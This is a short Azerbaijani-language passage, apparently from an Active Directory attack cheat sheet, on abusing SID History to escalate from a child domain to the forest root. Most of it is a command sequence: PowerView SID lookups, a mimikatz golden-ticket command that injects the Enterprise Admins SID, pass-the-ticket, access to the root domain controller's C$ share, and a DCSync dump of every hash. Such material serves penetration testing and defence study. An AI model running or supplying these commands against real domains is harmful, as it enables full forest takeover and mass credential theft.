SID History istifadəçinin bir domendən digərinə köçürüləcəyi miqrasiya ssenarilərini dəstəkləmək üçün nəzərdə tutulmuşdur. "Köhnə" domendəki resurslara girişi qorumaq üçün istifadəçinin əvvəlki SID yeni hesabının SID History-nə əlavə olunacaq. Beləliklə, belə bir Golden ticket yaratarkən, əsas domendə imtiyazlı qrupun (EA, DA və s.) SID-i əlavə edilə bilər ki, bu da bütün resurslara giriş imkanı verəcəkdir.
İstifadəsi
#PowerView istifadə edərək Cari Domenin SID-ni əldə edinGet-DomainSID-Domain current.root.domain.local#PowerView istifadə edərək root Domenin SID-ni əldə edinGet-DomainSID-Domain root.domain.local#Enteprise Adminlərin SID yaradınFormat: RootDomainSID-519#mimikatz-dan istifadə edərək golden ticket yaradınkerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
#ticket yaddaşa daxil edinkerberos::ptt \path\to\ticket\golden.kirbi#Root Domainin DC sadalayırdir \\dc.root.domain.local\C$#Və ya DCsync və mimikatz-dan istifadə edərək hashləri əldə edinlsadump::dcsync /domain:root.domain.local /all
